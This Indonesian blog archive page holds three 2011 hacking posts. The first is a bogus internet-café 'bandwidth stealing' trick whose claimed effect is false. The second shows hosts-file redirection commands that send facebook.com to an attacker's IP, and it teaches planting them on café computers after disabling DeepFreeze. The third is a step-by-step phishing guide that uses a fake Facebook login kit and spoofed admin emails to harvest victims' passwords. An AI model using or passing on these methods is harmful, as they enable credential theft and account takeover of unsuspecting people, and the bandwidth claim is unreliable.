January 2011 | Uphik Lamers

Saturday, January 22, 2011

Trik Memanipulasi Bandwidth di Warnet

 

Trik Memanipulasi Bandwidth di Warnet

Bagi yang sering menggunakan jasa warnet untuk surfing, browsing, blog walking, download, kirim email/ file, dsb nya, pasti pernah merasa kesal dengan lelet alias lemot nya koneksi internet di warnet tersebut. Memang gak semua warnet demikian, ada juga yang memiliki kecepatan koneksi yang cukup tinggi.
Nah, bagi yang mengalami masalah koneksi diatas, ada trik untuk melakukan hack atau katakanlah kita akan memanipulasi bandwidth di warnet tersebut, agar bandwidth dari klien yang lain pindah ke komputer yang kita pakai di warnet tersebut.
Ikuti langkah-langkah berikut ini :
1. Buka Mozilla Firefox
2. Ketikkan : about:config
3. Ubah string yang ada dihalaman about:config firefox menjadi TRUE
Network.http.pipelining true
Network.http.pipelining.maxrequests 64
Network.http.proxy.pipelining true
Khusus untuk Network.proxy.share_proxy_setting dibiarkan dalam dalam keadaan FALSE.
4. Kemudian buat string baru dengan cara klik kiri 1 x di sembarang tempat pada halaman about:config tersebut, klik kanan, pilih New —–Integer dan ketikkan : nglayout.initialpaint.delay, beri nilai 0.
5. Kemudian lakukan Refresh (F5).
6. Pada kotak address bar ketikkan : about:blank
7. Kemudian pada pilih Tools — Options
8. Aktifkan options Allow Web Site To Instal Software (beri tanda centang)
9. Kemudian OK dan tekan F5 untuk refresh.
Sampai disini langkah awalnya, minum dulu bentar sambil tengok kiri – kanan, kali2 aja ada pengunjung lain melihat aktivitas kita *gubrakkk*, keadaan aman … lanjutttt. Kita memerlukan bantuan software sedikit ya, gampang kok, gini caranya :
10. Masuk ke link ini : https://addons.mozilla.org/en-US/firefox/addon/125?applicationfiltered=firefox&id=125 untuk melakukan download terhadap software SwitchProxy Tool 1.4.1.
11. Setelah proses download selesai, jangan menekan tombol Update.
12. Biasanya akan muncul pop up windows, di close aja yach …
13. Tutup atau close browser Mozilla Firefox.
14. Kemudian buka lagi browser Mozilla Firefox dan apabila instalasi kita benar, maka dibawah toolbar navigasi & address bar akan muncul toolbar tambahan.
15. Selesai dan browser siap digunakan.
Apabila langkah-langkah ini sukses dilakukan, maka komputer yang kita gunakan akan bekerja untuk menyedot bandwidth dari pengunjung-pengunjung lain yang ada di warnet tersebut.






Hacking dengan Facelogin

 
TIPUAN FACELOGIN
buka CMD ( start ->run ->cmd) kemudian di cmd ketik

ECHO 91.197.130.19 WW W.FACEBOOK.COM>>C:\WINDOWS\system32\drivers\etc\hosts
anda pecinta facebook??tentu saja bermain FB sangat menyenangkan lalu apa yang terjadi ketika kita bermain FB koneksi menjadi lemot??
tentu sangat menyebalkan,terus apa dung solusi agar saat kita bermain FB tidak lemot??bermain FB menjadi lambat karena web browser kita mengirim data
facebook ke ip adress 69.63.184.31 dan karena banyak yang user
menggunakan/mengirim data ke 69.63.184.31 tentu akan semakin lambat juga lah koneksi kita
Tenang,hal ini bisa kita akali dengan cara mengganti ip addres agar web browser kita tidak rebutan dengan user FB lain..lalu bagaimana cara menggantinya??
buka CMD ( start ->run ->cmd) kemudian di cmd ketik

ECHO 91.197.130.19 WW W.FACEBOOK.COM>>C:\WINDOWS\system32\drivers\etc\hosts
in yang asli---à>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>(ECHO 69.63.184.31 WW W.FACEBOOK.COM>>C:\WINDOWS\system32\drivers\etc\hosts)



nah sekarang koneksi FB anda akan semakin cepat...
====================

udah di baca artikel ya???terus apa yang membuat artikel tersebut di katakan sebagai artikel penipuan??
ini karena si pembuat artikel menyuruh pembaca untuk melakukan perintah :

ECHO 91.197.130.19 WW W.FACEBOOK.COM>>C:\WINDOWS\system32\drivers\etc\hosts

yang kurang lebih arti nya : jika user mengakses alamat http://www.facebook.com maka akan di alihakan ke 91.197.130.19
terus apa yang salah dengan 91.197.130.19 ??? karena 91.197.130.19 adalah alamat palsu untuk melakukan fakelogin

untuk lebih jelas nya coba ke alamat :

http://www.google.com terus buka new tab kemudian masukan 64.233.181.147
sama kan ...artinya 64.233.181.147 adalah alamat lain dari http://www.google.com .

nah jadi kalo korban memlakukan perintah ECHO 91.197.130.19 WW W.FACEBOOK.COM>>C:\WINDOWS\system32\drivers\etc\hosts maka setiap korban mengunjungi alamat http://www.facebook.com
korban akan di alihkan ke 91.197.130.19(fake login punya kita)


udah ngertikan??


sekarang kita menggunakan tehnik ini untuk jebakan di warnet :

1.pertama kita membuat site fakelogin ,,tapi jangan di http://www.ripway.com karna gak bisa di gunakan untuk tehnik ini.
2.BUAT website fake login dengan domain terserah
3.bikin tampilan index website menjadi fakelogin facebook
3.kemudian buka cmd ketik PING http://WWW.sitefakelogin.domainkita
4.kemudian akan tampil di cmd kita
pinging http://WWW.sitefakelogin.domainkita [12.09.2343(berbeda2 ip adresanya]
5.catat no ip addres website kita

ok.kalo udah siap semua..sekarang kita menuju warnet
di warnet kita matiin dulu deepfreze ya..terus buka cmd ketik :

echo 12.09.2352 WW W.FACEBOOK.COM>>C:\WINDOWS\system32\drivers\etc\hosts

nb: 12.09.2352(no ip adres web fake login kita)


oke udah siap bro..

nah jadi..kalo ada user make komputer yang udah kita pasang jebakan terus dia mengakses http://www.facebook.com dia akan di alihkan ke website palsu kita

Thursday, January 6, 2011

HACKING FACEBOOK DENGAN METODE FACELOGIN

 

  1. Pertama-tama Buatlah akun di webhsoting gratis yang mendukung PHP script diantaranya : Byethost, Ripway, 50webs, fileave, dll
  2. Lalu Download script facebook fake login disini : download
  3. Extrak file yang sudah anda download tersebut dan simpan/upload di satu direktori di webhosting yang telah anda daftar, contoh http://AyaSweet.byethost.com/facebook/. 3 file tersebut yaitu :

    - Index.html
    - logs.php
    - logs.txt 
  4. Buatlah email palsu dengan memberikan embel-embel admin facebook tujuannya agar si korban percaya. contoh :

    admin_facebook@yahoo.com / admin.facebook.gmail.com / admin.fb@plasa.com
  5. Terus download isi pesan untuk email palsu disini atau disini. (file.doc)
  6. Buka isi file tersebut. Lalu ganti nama Cinta yang berwarna merah dengan nama anda dan ganti alamat_email_anda@gmail.com yang berwarna merah dengan alamat email palsu anda. Terus pada URL :

    http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2

    Yang berwarna biru ganti dengan URL halaman fake login yang telah anda buat. contoh : http://AyaSweet.byethost.com
  7. Setelah semuanya anda edit, segera kirim isi pesan tersebut ke alamat email + password si korban akan datang sendirinya ke email palsu anda kalau si korban ketipu.